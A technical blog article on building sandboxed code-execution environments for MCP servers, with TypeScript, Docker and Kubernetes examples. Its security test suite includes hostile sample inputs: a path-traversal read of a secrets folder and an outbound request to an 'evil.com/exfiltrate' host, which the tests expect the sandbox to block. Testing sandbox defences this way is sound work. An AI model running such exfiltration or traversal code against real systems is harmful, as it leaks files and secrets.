Bryan Thompson - MCP Quality Architect & Security Researcher

On November 4, 2025, Anthropic published a groundbreaking engineering insight that fundamentally changes how we should think about MCP server architecture: code execution as a first-class capability for reducing token consumption while enhancing agent capabilities. The demonstration showing 98.7% token reduction in real-world scenarios isn't just impressive—it represents a paradigm shift in production AI infrastructure design.

For teams building production MCP servers, this insight raises critical questions: How do we implement secure code execution environments? What are the quality engineering implications? How does this change our approach to MCP server design? Let's explore what code execution with MCP means for enterprise infrastructure.

The Token Consumption Crisis

Traditional MCP architectures face a fundamental scaling problem: as agents interact with more tools and data sources, token consumption grows exponentially. Every tool definition, every data transformation, every intermediate result consumes precious context window space.

Traditional MCP Token Overhead

Full Tool Schema Loading

Every available tool must be described in the context window, consuming thousands of tokens even when unused

Complete Dataset Transmission

Large datasets must be sent in their entirety to the model for processing and filtering

Intermediate Result Bloat

Every transformation step accumulates in the conversation history, degrading performance

Sequential Processing Latency

Complex operations require multiple model round-trips, each incurring API latency

In production environments, these constraints translate to real costs: higher API bills, slower response times, and architectural complexity managing context window limitations. The traditional approach of exposing every capability as a separate tool doesn't scale.

Code Execution Paradigm Shift

Code execution with MCP inverts the traditional architecture: instead of exposing hundreds of specialized tools, you provide a secure execution environment where agents can dynamically discover, filter, and compose capabilities programmatically.

Code Execution Efficiency Gains

98.7% Token Reduction

Anthropic's demonstration shows dramatic token savings through in-execution filtering and processing

Dynamic Tool Discovery

Agents can query available capabilities on-demand rather than loading all schemas upfront

In-Execution Data Filtering

Process large datasets in the execution environment, returning only relevant results to the model

Reduced Latency

Time to first token improves dramatically with fewer API round-trips

This isn't just an optimization—it's a fundamental rethinking of MCP architecture that enables capabilities previously impossible due to token constraints.

TYPESCRIPT

1// Traditional MCP Pattern: High Token Overhead
2// Every tool schema loaded into context
3const tools = [
4  { name: "list_files", schema: {...}, description: "..." },
5  { name: "read_file", schema: {...}, description: "..." },
6  { name: "search_files", schema: {...}, description: "..." },
7  // ... 100 more tool definitions
8];
9
10// Code Execution Pattern: Dynamic Discovery
11// Agent queries capabilities on-demand
12const availableTools = await executeCode(`
13  // List available filesystem operations
14  const fs = require('fs');
15  return Object.keys(fs).filter(k => typeof fs[k] === 'function');
16`);
17
18// Agent processes data in execution environment
19const results = await executeCode(`
20  const fs = require('fs');
21  const files = fs.readdirSync('./data');
22
23  // Filter in execution environment
24  const relevantFiles = files
25    .filter(f => f.includes('2025'))
26    .map(f => ({ name: f, size: fs.statSync(`./data/${f}`).size }))
27    .filter(f => f.size < 1000000);
28
29  // Return only processed results
30  return relevantFiles;
31`);
32
33// Token savings: Only final results transmitted to model
34// Original approach: 10,000+ tokens for all file metadata
35// Code execution: 200 tokens for filtered results
36// Reduction: 98%

Architecture and Implementation Patterns

Implementing code execution with MCP requires careful architectural decisions about execution environments, capability exposure, and state management.

Execution Environment Design

The execution environment is the foundation of this architecture. It must balance capability exposure with security isolation, performance with resource constraints.

TYPESCRIPT

1// MCP Server with Code Execution Environment
2import { Server } from '@modelcontextprotocol/sdk/server/index.js';
3import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
4import { VM } from 'vm2'; // Secure JavaScript execution
5
6class CodeExecutionMCPServer {
7  private server: Server;
8  private vm: VM;
9
10  constructor() {
11    this.server = new Server({
12      name: 'code-execution-mcp',
13      version: '1.0.0',
14    }, {
15      capabilities: {
16        tools: {}, // Expose code execution tool
17        resources: {} // Expose filesystem resources
18      }
19    });
20
21    // Create isolated execution environment
22    this.vm = new VM({
23      timeout: 5000, // 5 second execution limit
24      sandbox: {
25        // Controlled API exposure
26        fs: this.createSecureFilesystemAPI(),
27        console: this.createMonitoredConsole(),
28        // Custom MCP operations
29        mcp: this.createMCPOperations()
30      }
31    });
32
33    this.setupHandlers();
34  }
35
36  private createSecureFilesystemAPI() {
37    // Sandboxed filesystem access
38    return {
39      readdirSync: (path: string) => {
40        // Path traversal protection
41        const sanitized = this.sanitizePath(path);
42        // Allowlist verification
43        if (!this.isPathAllowed(sanitized)) {
44          throw new Error('Path access denied');
45        }
46        return fs.readdirSync(sanitized);
47      },
48      // ... other secured filesystem operations
49    };
50  }
51
52  private setupHandlers() {
53    // Handle code execution requests
54    this.server.setRequestHandler(ToolCallRequestSchema,
55      async (request) => {
56        if (request.params.name === 'execute_code') {
57          const code = request.params.arguments?.code as string;
58          const result = await this.executeSecurely(code);
59          return {
60            content: [{ type: 'text', text: JSON.stringify(result) }]
61          };
62        }
63      }
64    );
65  }
66
67  private async executeSecurely(code: string): Promise<any> {
68    try {
69      // Execute in isolated VM with timeout protection
70      const result = this.vm.run(code);
71
72      // Log execution for audit trail
73      this.logExecution(code, result);
74
75      return result;
76    } catch (error) {
77      // Handle execution errors safely
78      return { error: error.message };
79    }
80  }
81}
82
83export const server = new CodeExecutionMCPServer();

Dynamic Tool Discovery Pattern

Rather than exposing hundreds of tools, expose a capability discovery mechanism that agents can query programmatically.

TYPESCRIPT

1// Agent discovers capabilities dynamically
2const discoverTools = async () => {
3  const code = `
4    // Query available filesystem operations
5    const fsOps = Object.keys(mcp.fs)
6      .filter(k => typeof mcp.fs[k] === 'function')
7      .map(k => ({
8        name: k,
9        description: mcp.fs[k].toString().match(/\/\*\*([^*]|\*(?!\/))*\*\//)?.[0]
10      }));
11
12    // Query available database operations
13    const dbOps = Object.keys(mcp.db)
14      .filter(k => typeof mcp.db[k] === 'function')
15      .map(k => ({ name: k, signature: mcp.db[k].toString() }));
16
17    return { filesystem: fsOps, database: dbOps };
18  `;
19
20  return await executeCode(code);
21};
22
23// Agent uses discovered capabilities
24const capabilities = await discoverTools();
25
26// Only load schemas for tools actually needed
27const readFileSchema = capabilities.filesystem
28  .find(op => op.name === 'readFile');
29
30// Execute operation in code environment
31const fileContents = await executeCode(`
32  return mcp.fs.readFile('./config.json', 'utf8');
33`);
34
35// Token comparison:
36// Traditional: 5000 tokens (all filesystem tool schemas)
37// Dynamic discovery: 200 tokens (query + specific operation)
38// Reduction: 96%

Security and Sandboxing Requirements

Anthropic correctly emphasizes that code execution requires "secure execution environment with appropriate sandboxing." This isn't optional—it's the foundation of production-ready code execution with MCP.

Critical Security Requirements

Process Isolation

Code execution must occur in isolated processes with strict resource limits (CPU, memory, network)

Filesystem Sandboxing

Path traversal protection, allowlisting, and permission enforcement prevent unauthorized access

Network Restrictions

Outbound network access must be controlled through explicit allowlists or completely disabled

Execution Time Limits

Strict timeout enforcement prevents infinite loops and resource exhaustion attacks

Audit Logging

Complete execution audit trail for security investigation and compliance requirements

Sandboxing Implementation Options

TYPESCRIPT

1// Option 1: VM2 for JavaScript Isolation (Development)
2import { VM } from 'vm2';
3
4const vm = new VM({
5  timeout: 5000,
6  sandbox: { /* controlled API */ },
7  eval: false,
8  wasm: false
9});
10
11// Option 2: Docker Containers (Production)
12import Docker from 'dockerode';
13
14const docker = new Docker();
15
16async function executeInContainer(code: string) {
17  const container = await docker.createContainer({
18    Image: 'node:18-alpine',
19    Cmd: ['node', '-e', code],
20    NetworkDisabled: true,
21    Memory: 256 * 1024 * 1024, // 256MB limit
22    MemorySwap: 256 * 1024 * 1024,
23    CpuShares: 512,
24    AttachStdout: true,
25    AttachStderr: true
26  });
27
28  await container.start();
29
30  const timeout = setTimeout(async () => {
31    await container.kill();
32  }, 5000);
33
34  const stream = await container.logs({
35    stdout: true,
36    stderr: true,
37    follow: true
38  });
39
40  let output = '';
41  stream.on('data', (chunk) => { output += chunk.toString(); });
42
43  await container.wait();
44  clearTimeout(timeout);
45  await container.remove();
46
47  return output;
48}
49
50// Option 3: gVisor for Strong Kernel Isolation (Enterprise)
51// Use gVisor runtime with Docker for kernel-level isolation
52const secureContainer = await docker.createContainer({
53  Image: 'code-execution-env',
54  Runtime: 'runsc', // gVisor runtime
55  Cmd: ['node', '-e', code],
56  // ... security constraints
57});
58
59// Option 4: WebAssembly Sandboxing
60// Compile code to WASM for browser-level isolation
61import { WASI } from 'wasi';
62import { readFileSync } from 'fs';
63
64const wasi = new WASI({
65  args: process.argv,
66  env: {},
67  preopens: {
68    '/sandbox': '/tmp/sandbox' // Limited filesystem access
69  }
70});
71
72const wasm = await WebAssembly.compile(
73  readFileSync('./code-execution.wasm')
74);
75
76const instance = await WebAssembly.instantiate(wasm, {
77  wasi_snapshot_preview1: wasi.wasiImport
78});
79
80wasi.start(instance);

For production deployments, Docker containers with gVisor provide the best balance of security, performance, and operational simplicity. VM2 is suitable for development but shouldn't be used in production with untrusted code.

Production Deployment Strategies

Deploying code execution capabilities in production requires infrastructure planning beyond simple sandboxing. You need container orchestration, resource management, and monitoring infrastructure.

Kubernetes Deployment Architecture

YAML

1# Kubernetes deployment for code execution MCP server
2apiVersion: apps/v1
3kind: Deployment
4metadata:
5  name: code-execution-mcp
6spec:
7  replicas: 3
8  selector:
9    matchLabels:
10      app: code-execution-mcp
11  template:
12    metadata:
13      labels:
14        app: code-execution-mcp
15    spec:
16      # Security context for pod
17      securityContext:
18        runAsNonRoot: true
19        runAsUser: 1000
20        fsGroup: 1000
21        seccompProfile:
22          type: RuntimeDefault
23
24      containers:
25      - name: mcp-server
26        image: code-execution-mcp:latest
27
28        # Resource limits critical for security
29        resources:
30          requests:
31            memory: "512Mi"
32            cpu: "500m"
33          limits:
34            memory: "1Gi"
35            cpu: "1000m"
36
37        # Security hardening
38        securityContext:
39          allowPrivilegeEscalation: false
40          readOnlyRootFilesystem: true
41          capabilities:
42            drop: ["ALL"]
43
44        # Environment configuration
45        env:
46        - name: EXECUTION_TIMEOUT
47          value: "5000"
48        - name: MAX_MEMORY_MB
49          value: "256"
50        - name: ENABLE_NETWORK
51          value: "false"
52
53        # Health checks
54        livenessProbe:
55          httpGet:
56            path: /health
57            port: 8080
58          initialDelaySeconds: 30
59          periodSeconds: 10
60
61        readinessProbe:
62          httpGet:
63            path: /ready
64            port: 8080
65          initialDelaySeconds: 5
66          periodSeconds: 5
67
68        # Logging configuration
69        volumeMounts:
70        - name: logs
71          mountPath: /var/log/mcp
72
73      # Ephemeral volume for logs
74      volumes:
75      - name: logs
76        emptyDir: {}
77
78---
79# Service for MCP server
80apiVersion: v1
81kind: Service
82metadata:
83  name: code-execution-mcp
84spec:
85  selector:
86    app: code-execution-mcp
87  ports:
88  - port: 8080
89    targetPort: 8080
90
91---
92# Network policy restricting outbound access
93apiVersion: networking.k8s.io/v1
94kind: NetworkPolicy
95metadata:
96  name: code-execution-isolation
97spec:
98  podSelector:
99    matchLabels:
100      app: code-execution-mcp
101  policyTypes:
102  - Ingress
103  - Egress
104  ingress:
105  - from:
106    - podSelector:
107        matchLabels:
108          role: mcp-client
109    ports:
110    - protocol: TCP
111      port: 8080
112  egress:
113  - to:
114    - podSelector:
115        matchLabels:
116          role: database
117    ports:
118    - protocol: TCP
119      port: 5432
120  # No other egress allowed - code execution is isolated

Resource Management and Auto-Scaling

YAML

1# Horizontal Pod Autoscaler for code execution workloads
2apiVersion: autoscaling/v2
3kind: HorizontalPodAutoscaler
4metadata:
5  name: code-execution-mcp-hpa
6spec:
7  scaleTargetRef:
8    apiVersion: apps/v1
9    kind: Deployment
10    name: code-execution-mcp
11  minReplicas: 3
12  maxReplicas: 20
13  metrics:
14  # Scale on CPU utilization
15  - type: Resource
16    resource:
17      name: cpu
18      target:
19        type: Utilization
20        averageUtilization: 70
21  # Scale on memory utilization
22  - type: Resource
23    resource:
24      name: memory
25      target:
26        type: Utilization
27        averageUtilization: 80
28  # Scale on custom metrics (execution queue depth)
29  - type: Pods
30    pods:
31      metric:
32        name: execution_queue_depth
33      target:
34        type: AverageValue
35        averageValue: "10"
36  behavior:
37    scaleDown:
38      stabilizationWindowSeconds: 300
39      policies:
40      - type: Percent
41        value: 50
42        periodSeconds: 60
43    scaleUp:
44      stabilizationWindowSeconds: 60
45      policies:
46      - type: Percent
47        value: 100
48        periodSeconds: 30
49
50---
51# Pod Disruption Budget for high availability
52apiVersion: policy/v1
53kind: PodDisruptionBudget
54metadata:
55  name: code-execution-mcp-pdb
56spec:
57  minAvailable: 2
58  selector:
59    matchLabels:
60      app: code-execution-mcp

Performance Optimization Techniques

While code execution dramatically reduces token consumption, execution overhead can impact latency. Smart caching and execution planning minimize this impact.

Result Caching Strategy

TYPESCRIPT

1// Intelligent caching for code execution results
2import { createHash } from 'crypto';
3import Redis from 'ioredis';
4
5class ExecutionCache {
6  private redis: Redis;
7  private ttl: number = 3600; // 1 hour default
8
9  constructor() {
10    this.redis = new Redis({
11      host: process.env.REDIS_HOST,
12      port: parseInt(process.env.REDIS_PORT || '6379'),
13      // Cluster configuration for production
14      enableReadyCheck: true,
15      maxRetriesPerRequest: 3
16    });
17  }
18
19  private generateCacheKey(code: string, context: any): string {
20    // Hash code + context for cache key
21    const content = JSON.stringify({ code, context });
22    return `exec:${createHash('sha256').update(content).digest('hex')}`;
23  }
24
25  async getCached(code: string, context: any): Promise<any | null> {
26    const key = this.generateCacheKey(code, context);
27    const cached = await this.redis.get(key);
28
29    if (cached) {
30      // Track cache hit metrics
31      this.metrics.increment('execution.cache.hit');
32      return JSON.parse(cached);
33    }
34
35    this.metrics.increment('execution.cache.miss');
36    return null;
37  }
38
39  async setCached(
40    code: string,
41    context: any,
42    result: any,
43    ttl?: number
44  ): Promise<void> {
45    const key = this.generateCacheKey(code, context);
46    await this.redis.setex(
47      key,
48      ttl || this.ttl,
49      JSON.stringify(result)
50    );
51  }
52
53  async invalidatePattern(pattern: string): Promise<void> {
54    // Invalidate cache entries matching pattern
55    const keys = await this.redis.keys(`exec:*${pattern}*`);
56    if (keys.length > 0) {
57      await this.redis.del(...keys);
58    }
59  }
60}
61
62// Usage in MCP server
63class CodeExecutionMCPServer {
64  private cache: ExecutionCache;
65
66  async executeCode(code: string, context: any): Promise<any> {
67    // Check cache first
68    const cached = await this.cache.getCached(code, context);
69    if (cached) {
70      return cached;
71    }
72
73    // Execute if not cached
74    const result = await this.vm.run(code);
75
76    // Determine cacheable based on code analysis
77    if (this.isCacheable(code)) {
78      await this.cache.setCached(code, context, result);
79    }
80
81    return result;
82  }
83
84  private isCacheable(code: string): boolean {
85    // Don't cache code with time-sensitive operations
86    const nonCacheablePatterns = [
87      /new Date\(/,
88      /Math\.random\(/,
89      /Date\.now\(/,
90      /performance\.now\(/
91    ];
92
93    return !nonCacheablePatterns.some(pattern => pattern.test(code));
94  }
95}

Connection Pooling for Container Execution

TYPESCRIPT

1// Container pool for faster execution startup
2class ContainerPool {
3  private pool: Docker.Container[];
4  private available: Docker.Container[];
5  private poolSize: number = 10;
6
7  constructor(private docker: Docker) {
8    this.pool = [];
9    this.available = [];
10  }
11
12  async initialize(): Promise<void> {
13    // Pre-warm container pool
14    const containers = await Promise.all(
15      Array(this.poolSize).fill(null).map(() =>
16        this.createContainer()
17      )
18    );
19
20    this.pool = containers;
21    this.available = [...containers];
22  }
23
24  private async createContainer(): Promise<Docker.Container> {
25    return await this.docker.createContainer({
26      Image: 'code-execution-env:latest',
27      NetworkDisabled: true,
28      Memory: 256 * 1024 * 1024,
29      Tty: false,
30      OpenStdin: true,
31      StdinOnce: false,
32      // Keep container alive for reuse
33      Cmd: ['node', '--eval', 'process.stdin.resume()']
34    });
35  }
36
37  async acquire(): Promise<Docker.Container> {
38    // Wait for available container
39    while (this.available.length === 0) {
40      await new Promise(resolve => setTimeout(resolve, 100));
41    }
42
43    const container = this.available.shift()!;
44
45    // Ensure container is running
46    const info = await container.inspect();
47    if (!info.State.Running) {
48      await container.start();
49    }
50
51    return container;
52  }
53
54  async release(container: Docker.Container): Promise<void> {
55    // Reset container state
56    await this.cleanupContainer(container);
57
58    // Return to available pool
59    this.available.push(container);
60  }
61
62  private async cleanupContainer(
63    container: Docker.Container
64  ): Promise<void> {
65    // Remove any created files
66    await container.exec({
67      Cmd: ['sh', '-c', 'rm -rf /tmp/*'],
68      AttachStdout: false,
69      AttachStderr: false
70    });
71
72    // Clear process state
73    // (implementation depends on execution model)
74  }
75
76  async destroy(): Promise<void> {
77    // Cleanup all containers
78    await Promise.all(
79      this.pool.map(async (container) => {
80        try {
81          await container.stop();
82          await container.remove();
83        } catch (error) {
84          // Already stopped/removed
85        }
86      })
87    );
88  }
89}
90
91// Usage reduces cold start latency from ~2s to ~50ms
92const pool = new ContainerPool(docker);
93await pool.initialize();
94
95async function executeWithPool(code: string): Promise<any> {
96  const container = await pool.acquire();
97  try {
98    const result = await executeInContainer(container, code);
99    return result;
100  } finally {
101    await pool.release(container);
102  }
103}

Enterprise Implementation Guidelines

Enterprise deployments require additional considerations around compliance, audit logging, and data privacy that go beyond basic sandboxing.

Privacy-Preserving Execution

Anthropic highlights that code execution supports "privacy-preserving operations by keeping intermediate results in execution environment" and "automatically tokenizing sensitive data." This is critical for enterprise compliance.

TYPESCRIPT

1// Privacy-preserving data processing in execution environment
2class PrivacyPreservingExecutor {
3  async processCustomerData(customerIds: string[]): Promise<any> {
4    // Execute data processing in secure environment
5    const code = `
6      const { tokenize, process } = mcp.privacy;
7
8      // Load customer data in execution environment
9      const customers = await mcp.db.query(
10        'SELECT * FROM customers WHERE id = ANY($1)',
11        [customerIds]
12      );
13
14      // Process without exposing PII to model
15      const insights = customers.map(customer => {
16        // Tokenize PII fields
17        const tokenized = {
18          customerId: tokenize(customer.id),
19          email: tokenize(customer.email),
20          // Aggregate, non-PII insights only
21          purchaseCount: customer.orders.length,
22          avgOrderValue: customer.orders.reduce(
23            (sum, order) => sum + order.total, 0
24          ) / customer.orders.length,
25          lastPurchase: customer.orders[0]?.date
26        };
27
28        return tokenized;
29      });
30
31      // Return aggregated insights only
32      return {
33        totalCustomers: insights.length,
34        avgPurchaseCount: insights.reduce(
35          (sum, i) => sum + i.purchaseCount, 0
36        ) / insights.length,
37        avgOrderValue: insights.reduce(
38          (sum, i) => sum + i.avgOrderValue, 0
39        ) / insights.length
40      };
41    `;
42
43    // Execute code - PII never transmitted to model
44    return await this.execute(code);
45  }
46}
47
48// Audit logging for compliance
49class AuditLogger {
50  async logExecution(execution: {
51    code: string;
52    user: string;
53    timestamp: Date;
54    dataAccessed: string[];
55    result: any;
56  }): Promise<void> {
57    // Comprehensive audit trail
58    await this.db.query(`
59      INSERT INTO execution_audit_log (
60        execution_id,
61        user_id,
62        timestamp,
63        code_hash,
64        data_accessed,
65        execution_duration_ms,
66        result_summary
67      ) VALUES ($1, $2, $3, $4, $5, $6, $7)
68    `, [
69      uuidv4(),
70      execution.user,
71      execution.timestamp,
72      this.hashCode(execution.code),
73      JSON.stringify(execution.dataAccessed),
74      execution.durationMs,
75      this.summarizeResult(execution.result)
76    ]);
77  }
78
79  // Compliance reporting
80  async generateComplianceReport(
81    startDate: Date,
82    endDate: Date
83  ): Promise<ComplianceReport> {
84    // Query audit log for compliance reporting
85    const executions = await this.db.query(`
86      SELECT
87        user_id,
88        COUNT(*) as execution_count,
89        jsonb_array_elements_text(data_accessed) as accessed_table,
90        COUNT(DISTINCT accessed_table) as unique_tables_accessed
91      FROM execution_audit_log
92      WHERE timestamp BETWEEN $1 AND $2
93      GROUP BY user_id, accessed_table
94    `, [startDate, endDate]);
95
96    return this.formatComplianceReport(executions);
97  }
98}

Quality Engineering and Testing

Code execution with MCP introduces new testing requirements beyond traditional MCP server validation. You need to test sandbox escape attempts, resource exhaustion scenarios, and execution correctness.

TYPESCRIPT

1// Comprehensive test suite for code execution MCP server
2describe('Code Execution MCP Server', () => {
3  describe('Security Tests', () => {
4    it('should prevent filesystem traversal attacks', async () => {
5      const maliciousCode = `
6        const fs = require('fs');
7        return fs.readdirSync('../../secrets/');
8      `;
9
10      await expect(
11        executeCode(maliciousCode)
12      ).rejects.toThrow('Path access denied');
13    });
14
15    it('should prevent network access', async () => {
16      const maliciousCode = `
17        const https = require('https');
18        return new Promise((resolve) => {
19          https.get('https://evil.com/exfiltrate', resolve);
20        });
21      `;
22
23      await expect(
24        executeCode(maliciousCode)
25      ).rejects.toThrow('Network access denied');
26    });
27
28    it('should enforce execution timeout', async () => {
29      const infiniteLoop = `
30        while(true) { /* infinite loop */ }
31      `;
32
33      const start = Date.now();
34      await expect(
35        executeCode(infiniteLoop)
36      ).rejects.toThrow('Execution timeout');
37
38      const duration = Date.now() - start;
39      expect(duration).toBeLessThan(6000); // 5s timeout + 1s buffer
40    });
41
42    it('should enforce memory limits', async () => {
43      const memoryExhaustion = `
44        const arrays = [];
45        while(true) {
46          arrays.push(new Array(1000000).fill('x'));
47        }
48      `;
49
50      await expect(
51        executeCode(memoryExhaustion)
52      ).rejects.toThrow('Memory limit exceeded');
53    });
54  });
55
56  describe('Correctness Tests', () => {
57    it('should execute valid data transformations', async () => {
58      const code = `
59        const data = [1, 2, 3, 4, 5];
60        return data
61          .filter(x => x % 2 === 0)
62          .map(x => x * 2);
63      `;
64
65      const result = await executeCode(code);
66      expect(result).toEqual([4, 8]);
67    });
68
69    it('should preserve execution context across calls', async () => {
70      // First execution sets state
71      await executeCode(`
72        mcp.state.counter = 0;
73      `);
74
75      // Second execution reads state
76      const result = await executeCode(`
77        return ++mcp.state.counter;
78      `);
79
80      expect(result).toBe(1);
81    });
82  });
83
84  describe('Performance Tests', () => {
85    it('should complete execution within latency budget', async () => {
86      const code = `
87        const fs = require('fs');
88        const files = fs.readdirSync('./data');
89        return files.filter(f => f.endsWith('.json'));
90      `;
91
92      const start = Date.now();
93      await executeCode(code);
94      const duration = Date.now() - start;
95
96      // Execution should complete in <100ms
97      expect(duration).toBeLessThan(100);
98    });
99
100    it('should handle concurrent executions', async () => {
101      const executions = Array(100).fill(null).map((_, i) =>
102        executeCode(`return ${i} * 2;`)
103      );
104
105      const results = await Promise.all(executions);
106
107      // Verify all executions completed correctly
108      results.forEach((result, i) => {
109        expect(result).toBe(i * 2);
110      });
111    });
112  });
113
114  describe('Integration Tests', () => {
115    it('should integrate with MCP filesystem resources', async () => {
116      const code = `
117        // Access filesystem through MCP resource API
118        const content = await mcp.resources.read(
119          'file:///data/config.json'
120        );
121        return JSON.parse(content);
122      `;
123
124      const result = await executeCode(code);
125      expect(result).toHaveProperty('apiKey');
126    });
127
128    it('should integrate with MCP database tools', async () => {
129      const code = `
130        // Query database through MCP tool API
131        const users = await mcp.tools.call('db_query', {
132          sql: 'SELECT COUNT(*) FROM users WHERE active = true'
133        });
134        return users[0].count;
135      `;
136
137      const result = await executeCode(code);
138      expect(typeof result).toBe('number');
139    });
140  });
141});

Future Implications for MCP Infrastructure

Code execution with MCP isn't just an optimization technique—it's a fundamental shift in how we should think about MCP server architecture. The implications extend far beyond token reduction.

Future Architecture Patterns

Composable MCP Capabilities

Code execution enables agents to compose capabilities dynamically rather than requiring pre-defined tool combinations

Higher-Level Abstractions

Build libraries of reusable code patterns that agents can leverage without tool schema overhead

Stateful Agent Workflows

Maintain execution state across multi-step operations without bloating conversation history

Edge Computing Patterns

Process data closer to its source, transmitting only insights to the model rather than raw data

As MCP ecosystems mature, we'll see code execution become a standard capability rather than an advanced pattern. The 98.7% token reduction demonstrated by Anthropic isn't just impressive—it's economically necessary for complex multi-agent systems operating at scale.

The challenge for infrastructure teams is implementing secure, performant code execution environments before they become a competitive requirement. Organizations that master this pattern early will have significant advantages in building sophisticated AI systems that remain cost-effective at scale.

Triepod.ai

Table of Contents

Code Execution with MCP: 98.7% Token Reduction Through Efficient Agent Architecture

The Token Consumption Crisis

Traditional MCP Token Overhead

Code Execution Paradigm Shift

Code Execution Efficiency Gains

Architecture and Implementation Patterns

Execution Environment Design

Dynamic Tool Discovery Pattern

Security and Sandboxing Requirements

Critical Security Requirements

Sandboxing Implementation Options

Production Deployment Strategies

Kubernetes Deployment Architecture

Resource Management and Auto-Scaling

Performance Optimization Techniques

Result Caching Strategy

Connection Pooling for Container Execution

Enterprise Implementation Guidelines

Privacy-Preserving Execution

Quality Engineering and Testing

Future Implications for MCP Infrastructure

Future Architecture Patterns

Need Help Implementing Code Execution with MCP?